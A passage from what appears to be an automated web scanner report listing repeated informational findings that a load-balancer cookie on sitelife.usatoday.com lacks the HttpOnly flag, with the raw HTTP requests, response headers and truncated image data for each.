User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 1233
Content-Type: image/jpeg
Last-Modified: Tue, 18 May 2010 09:36:30 GMT
Accept-Ranges: bytes
ETag: "567345986df6ca1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:47 GMT
Connection: close

......JFIF.....`.`.....C......................... ....................!........."$".$.......C.......................................................................(.(.."..............................
...[SNIP]...

16.136. http://sitelife.usatoday.com/ver1.0/Content/images/store/9/9/792de6a9-477b-46db-891e-75ece59c0187.P4Avatar.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/images/store/9/9/792de6a9-477b-46db-891e-75ece59c0187.P4Avatar.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/store/9/9/792de6a9-477b-46db-891e-75ece59c0187.P4Avatar.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 1326
Content-Type: image/jpeg
Last-Modified: Mon, 28 Feb 2011 19:01:35 GMT
Accept-Ranges: bytes
ETag: "cae7ceeb79d7cb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:47 GMT
Connection: close

......JFIF.....`.`.....C......................... ....................!........."$".$.......C.......................................................................(.(.."..............................
...[SNIP]...

16.137. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 6118
Content-Type: image/png
Last-Modified: Tue, 02 Nov 2010 13:29:18 GMT
Accept-Ranges: bytes
ETag: "ee4b52f3917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:52 GMT
Connection: close

.PNG
.
...IHDR....... .......<.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..].T.W........@..."DAl@Q...8 .#j61.Dg49g&c.d..3....d..d...1N.D..y.w....c...8.@.FA...AE%.l.Q....._U......N.:U..._.W...{.
...[SNIP]...

16.138. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-background.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/comments/pluck-comm-background.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-background.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 202
Content-Type: image/png
Last-Modified: Tue, 02 Nov 2010 13:29:18 GMT
Accept-Ranges: bytes
ETag: "48ae54f3917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:52 GMT
Connection: close

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...lIDATx.... .0..AY..8P.
..].a.3%l.Ww.......D.....J..M ......r........ 3...... .........2c................O.......l......IEND.B
...[SNIP]...

16.139. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 386
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:18 GMT
Accept-Ranges: bytes
ETag: "48ae54f3917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:47 GMT
Connection: close

GIF89a.......................................................................................................|~.lmn.......................................fff...........................................
...[SNIP]...

16.140. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 386
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:18 GMT
Accept-Ranges: bytes
ETag: "a21057f3917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:47 GMT
Connection: close

GIF89a.......................................................................................................|~.lmn.......................................fff...........................................
...[SNIP]...

16.141. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 657
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:18 GMT
Accept-Ranges: bytes
ETag: "48ae54f3917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:44 GMT
Connection: close

GIF89a..................................................................................................................................................................................................
...[SNIP]...

16.142. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-blocked.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/pluck-avatar-blocked.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-avatar-blocked.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 939
Content-Type: image/gif
Last-Modified: Mon, 08 Nov 2010 13:46:34 GMT
Accept-Ranges: bytes
ETag: "39786e5b4b7fcb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:44 GMT
Connection: close

GIF89a(.(...................................vv.nn................mm..................................rr..........nn..........{{...................................................................mm....
...[SNIP]...

16.143. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-default.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/pluck-avatar-default.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-avatar-default.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 624
Content-Type: image/gif
Last-Modified: Mon, 08 Nov 2010 13:46:35 GMT
Accept-Ranges: bytes
ETag: "5fac45c4b7fcb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:47 GMT
Connection: close

GIF89a(.(...............................................................................................................................................................................................
...[SNIP]...

16.144. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 643
Content-Type: image/jpeg
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "209dc8f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:52 GMT
Connection: close

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
...........Q................... ... .......

.

.......................................................................................
...[SNIP]...

16.145. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/pluck-pagination-bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-pagination-bg.jpg HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 1448
Content-Type: image/jpeg
Last-Modified: Mon, 08 Nov 2010 16:08:58 GMT
Accept-Ranges: bytes
ETag: "9b793f405f7fcb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:47 GMT
Connection: close

......JFIF.....d.d......Ducky.......<.....&Adobe.d...........
...r...3...V................... ... .......

.

.......................................................................................
...[SNIP]...

16.146. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-last-bg.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/pluck-pagination-last-bg.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-pagination-last-bg.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 537
Content-Type: image/png
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "b813bff4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:52 GMT
Connection: close

.PNG
.
...IHDR.............".N'....tEXtSoftware.Adobe ImageReadyq.e<....IDATx....j.@...M...`.Z.5...............(..1.>......^.. .$*..$..D*XDS0RJ........lf....Z.f6...c8a>...x..t..j.j...D".x<.G.....V.
...[SNIP]...

16.147. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-next-bg.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/pluck-pagination-next-bg.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-pagination-next-bg.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 500
Content-Type: image/png
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "6cd8c3f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:53 GMT
Connection: close

.PNG
.
...IHDR...E.........g.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx....k.P....h..`p.P..:.T!.........k......+8;(...`...W.Ms.t)...........'..0.q.j..n...b.Q..F.....:c.f..N.H....B.BY........P.
...[SNIP]...

16.148. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-left.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/pluck-primary-button-left.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-primary-button-left.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 638
Content-Type: image/png
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "1276c1f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:52 GMT
Connection: close

.PNG
.
...IHDR...,.................tEXtSoftware.Adobe ImageReadyq.e<... IDATx....k.A...g....$.)..A...X.....7.XY..cmsDm..!(.Q....5....+b.r....Yg..]1..O...,<.fv.../=..w.u.@.j.kw....E....XEQ$...... Y.
...[SNIP]...

16.149. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-primary-button-right.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/pluck-primary-button-right.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/pluck-primary-button-right.png HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 440
Content-Type: image/png
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
